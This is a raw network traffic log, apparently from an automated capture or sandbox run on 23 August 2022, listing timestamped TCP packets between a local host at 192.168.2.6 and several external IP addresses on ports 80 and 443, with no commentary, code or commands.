                                                                                                                                                                      Aug 23, 2022 18:26:31.467338085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467369080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467370033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467407942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467431068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467454910 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467456102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467479944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467482090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467500925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467511892 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467538118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467564106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467601061 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467628002 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467647076 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467654943 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467669964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467674971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467700958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467726946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468168974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468192101 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468218088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468238115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468240976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468271017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468288898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468317986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468909025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468966007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.468969107 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.468995094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.469011068 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.469016075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.469039917 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.469062090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.470567942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.470598936 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.470623016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.470640898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.470647097 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.470685005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.470719099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.493752003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493824005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493865967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493874073 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.493906021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493906975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.493918896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.493946075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493962049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.493980885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.493997097 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494003057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494033098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494056940 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494059086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494083881 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494090080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494103909 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494112968 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494128942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494148016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494155884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494158030 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494180918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494182110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494199038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494204044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494224072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494225025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494249105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494251013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494266033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494277000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494294882 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494294882 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494318008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494342089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494371891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494399071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494417906 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494424105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494437933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494441986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494467020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494467974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494493008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494493008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494515896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494518042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494534969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494537115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494560003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494560957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494582891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494584084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494606018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494609118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494625092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494626999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494649887 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494674921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494823933 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494878054 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494880915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.494925022 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.494997025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495014906 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495043039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495068073 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495301962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495331049 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495368958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495383024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495393038 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495405912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495431900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495433092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495450974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495457888 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495481968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495484114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495500088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495506048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495524883 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495527029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495551109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495556116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495577097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495579004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495593071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495606899 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495618105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495620012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495642900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495651007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495670080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495680094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495687962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495695114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495718956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495752096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495752096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495779991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495805025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495810986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495825052 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495855093 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.495912075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495986938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.495989084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.496026993 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.496052980 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.496056080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.496068001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.496072054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.496102095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.496112108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.496161938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.496181965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.496217966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.497944117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:37.734083891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:37.734169006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:37.769424915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:37.769450903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:37.769464016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:37.879812956 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:37.880165100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:45.851303101 CEST44349818148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:45.851443052 CEST44349818148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:45.851491928 CEST49818443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:47.113416910 CEST49818443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:47.113440990 CEST44349818148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:48.369081974 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:48.369108915 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:48.587105989 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:48.587223053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:48.621103048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:48.621125937 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:48.719105959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:48.719177961 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:50.253169060 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:50.299624920 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.303253889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:50.349514008 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.349551916 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.349566936 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.349611998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:50.349670887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:50.396135092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.396171093 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.396186113 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.396202087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.396217108 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.612616062 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:50.612700939 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:57.459235907 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.459285021 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.459408998 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.460462093 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.460484982 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.463721991 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.463741064 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.464540958 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.464565039 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.464570999 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.508099079 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.509040117 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.530589104 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.530616045 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.531100988 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.531121016 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.531203032 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.531692028 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.531944036 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.532093048 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.532121897 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.533210039 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.533224106 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.533370972 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.551743984 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.551894903 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.552309990 CEST49876443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.552334070 CEST443498768.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.576113939 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.576205015 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.665020943 CEST49875443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:57.665052891 CEST443498758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.719981909 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.720031977 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.720139027 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.721088886 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.721091032 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.721106052 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.721132040 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.721211910 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.721354008 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.721365929 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.836252928 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.837233067 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.837369919 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.837389946 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.837625027 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.837660074 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.839215994 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.839325905 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:57.845058918 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:57.845156908 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.042912006 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.043178082 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.043840885 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.044012070 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.044264078 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.044286013 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.044307947 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.044332981 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.113651991 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.113728046 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.113765001 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.113852024 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.113878012 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.116758108 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.116853952 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.116873026 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.117043018 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.117096901 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.117104053 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.118490934 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.118551016 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.118557930 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.119978905 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.120059967 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.120073080 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.133013010 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.133078098 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.133101940 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.133131027 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.133183002 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.133392096 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.134898901 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.134949923 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.134985924 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.134999037 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.135059118 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.136287928 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.137682915 CEST44349878216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:58.137768030 CEST49878443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:26:58.137779951 CEST44349878216.58.209.35192.168.2.6
